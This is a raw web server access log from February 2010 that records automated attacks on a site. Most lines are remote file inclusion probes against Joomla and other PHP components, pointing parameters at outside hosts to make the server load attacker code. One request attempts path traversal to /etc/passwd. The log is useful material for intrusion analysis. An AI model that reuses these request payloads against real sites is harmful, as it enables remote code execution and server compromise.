211.180.124.146 - - [15/Feb/2010:06:33:28 -0800] "GET /logs///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:33:28 -0800] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:33:39 -0800] "GET /logs///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:33:39 -0800] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:33:39 -0800] "GET /logs/access_100119.log%20%20///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:06:35:31 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:35:32 -0800] "GET /logs/access_100111.log%20%20///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:35:38 -0800] "GET /logs/access_100111.log%20%20///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:35:54 -0800] "GET /logs/access_100111.log%20%20///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:36:02 -0800] "GET /logs/access_100111.log%20%20///components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:06:36:18 -0800] "GET /logs/access_100111.log//index.php?option=com_virtuemart&page=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:06:36:18 -0800] "GET /logs//index.php?option=com_virtuemart&page=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:06:36:19 -0800] "GET /index.php?option=com_virtuemart&page=http://maniacos.net/_vti_text?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:06:36:36 -0800] "GET /logs/access_100124.log//index.php?option=com_virtuemart&page=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:36:51 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:36:51 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:36:52 -0800] "GET /logs/access_100206.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.133.244.22 - - [15/Feb/2010:06:37:11 -0800] "GET /logs/access_100202.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.133.244.22 - - [15/Feb/2010:06:37:11 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.133.244.22 - - [15/Feb/2010:06:37:13 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.133.244.22 - - [15/Feb/2010:06:37:35 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.70.240.27 - - [15/Feb/2010:06:37:48 -0800] "GET / HTTP/1.1" 200 2392 "http://www.dealplanet.us" "Mozilla/5.0 (compatible; DealPlanetContentAnalysis/1.0; http://www.dealplanet.us)" "pixero.net"
91.121.25.16 - - [15/Feb/2010:06:39:23 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:06:39:23 -0800] "GET /logs/access_100127.log/become_editor.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.90.101.2 - - [15/Feb/2010:06:39:32 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:40:04 -0800] "GET /logs/access_100201.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:40:10 -0800] "GET /logs/access_100115.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:40:10 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:40:10 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:40:11 -0800] "GET /logs/access_100103.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:12 -0800] "GET /logs/access_100205.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:12 -0800] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:12 -0800] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:40:14 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:28 -0800] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:29 -0800] "GET /logs/access_100205.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:29 -0800] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:29 -0800] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:29 -0800] "GET /logs/access_100205.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:29 -0800] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:40:29 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:40:29 -0800] "GET /logs/access_100109.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:40:32 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:39 -0800] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:39 -0800] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:06:40:39 -0800] "GET /logs/access_100205.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:41:06 -0800] "GET /logs/htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:41:06 -0800] "GET /htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:41:06 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:41:08 -0800] "GET /logs/access_100125.log%20%20/htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:41:15 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:41:15 -0800] "GET /htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:41:15 -0800] "GET /logs/htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:41:16 -0800] "GET /logs/access_100125.log%20%20/htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:42:18 -0800] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:42:18 -0800] "GET /logs/access_100119.log///components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:42:18 -0800] "GET /logs///components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:42:22 -0800] "GET /logs/access_100115.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:42:22 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:42:23 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:42:28 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:42:32 -0800] "GET /logs/access_100119.log///components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:42:32 -0800] "GET /logs///components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:42:32 -0800] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:43:03 -0800] "GET /logs///components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:43:04 -0800] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:43:17 -0800] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:43:17 -0800] "GET /logs///components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:43:17 -0800] "GET /logs/access_100119.log%20%20///components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:43:20 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:43:20 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:43:20 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:43:22 -0800] "GET /logs/access_100111.log///components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:43:27 -0800] "GET /logs/access_100118.log/index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:43:29 -0800] "GET /logs/access_100103.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:43:30 -0800] "GET /logs/index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:43:30 -0800] "GET /index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:43:36 -0800] "GET /logs/access_100111.log///components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:43:49 -0800] "GET /index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:43:49 -0800] "GET /logs/index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:43:50 -0800] "GET /logs/access_100118.log/index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:44:03 -0800] "GET /logs/access_100114.log/index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:44:30 -0800] "GET /logs/access_100114.log/index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.76.12.197 - - [15/Feb/2010:06:45:17 -0800] "GET /logs/errors.php?error=http://www.steklo-vsem.ru/webalizer/.../main_products/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
82.76.12.197 - - [15/Feb/2010:06:45:17 -0800] "GET /errors.php?error=http://www.steklo-vsem.ru/webalizer/.../main_products/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:45:29 -0800] "GET /logs/access_100115.log/htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:45:33 -0800] "GET /logs/access_100125.log/htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:45:44 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:45:44 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:45:44 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:45:45 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [15/Feb/2010:06:45:45 -0800] "GET /logs/access_100111.log/akocomments.php?mosConfig_absolute_path=http://copypartner.com/content/files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:45:46 -0800] "GET /index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:45:46 -0800] "GET /logs/access_100118.log/index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:45:46 -0800] "GET /logs/index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [15/Feb/2010:06:45:55 -0800] "GET /logs/access_100125.log/akocomments.php?mosConfig_absolute_path=http://copypartner.com/content/files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:06:46:02 -0800] "GET /logs/access_100114.log/index1.php?x=http://www.lorisholiday.com/store/images/a.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:46:04 -0800] "GET /logs/access_100115.log/htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:46:05 -0800] "GET /logs/access_100103.log/htmltonuke.php?filnavn=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:06:46:18 -0800] "GET /logs//bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:06:46:18 -0800] "GET /logs/access_100202.log%20%20//bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:06:46:18 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:06:46:18 -0800] "GET /logs/access_100121.log%20%20//bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:06:46:26 -0800] "GET /logs/access_100202.log%20%20//bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:06:46:26 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:06:46:26 -0800] "GET /logs//bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:06:46:26 -0800] "GET /logs/access_100121.log%20%20//bbs///delete_comment.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:46:42 -0800] "GET /logs///dm-albums/template/album.php?SECURITY_FILE=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:46:42 -0800] "GET //dm-albums/template/album.php?SECURITY_FILE=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:46:42 -0800] "GET /logs/access.log%20%20///dm-albums/template/album.php?SECURITY_FILE=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:46:42 -0800] "GET /logs///dm-albums/template/album.php?SECURITY_FILE=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:46:43 -0800] "GET //dm-albums/template/album.php?SECURITY_FILE=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:46:43 -0800] "GET /logs/access.log%20%20///dm-albums/template/album.php?SECURITY_FILE=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:46:47 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:46:47 -0800] "GET /logs/access_100109.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:46:50 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
